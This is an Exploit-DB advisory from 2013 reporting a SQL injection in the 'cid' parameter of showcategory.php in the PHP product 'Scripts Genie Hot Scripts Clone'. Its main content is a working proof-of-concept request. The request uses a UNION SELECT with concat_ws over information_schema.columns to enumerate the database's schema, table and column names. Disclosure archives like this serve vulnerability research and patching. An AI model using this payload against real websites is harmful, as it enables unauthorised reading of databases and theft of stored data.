Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection

EDB-ID:

24516

CVE:

EDB Verified:

Author:

Easy Laster

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2013-02-18

Vulnerable App:

-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+             Security Flaw            +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+                         __     _     +
+ ___  ___  ___ _   _  /\ \ \___| |_   +
+/ __|/ _ \/ __| | | |/  \/ / _ \ __|  +
+\__ \  __/ (__| |_| / /\  /  __/ |_   +
+|___/\___|\___|\__,_\_\ \/ \___|\__|  +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+  SQL Injection Vulnerability PoC     +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+       Discovered by Easy Laster      +
+      Autor : Easy Laster             +
+       Date   :17.02.2013             +
+      Script:Scripts Genie            +
+        Hot Scripts Clone Script      +
+        scriptsgenie.com              +
+       Price  ::$1.75                 +
+      Language: PHP                   +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+              Vulnerability           +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+           Proof of Concept           +
+        Crawling the MYSQL Stack      +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services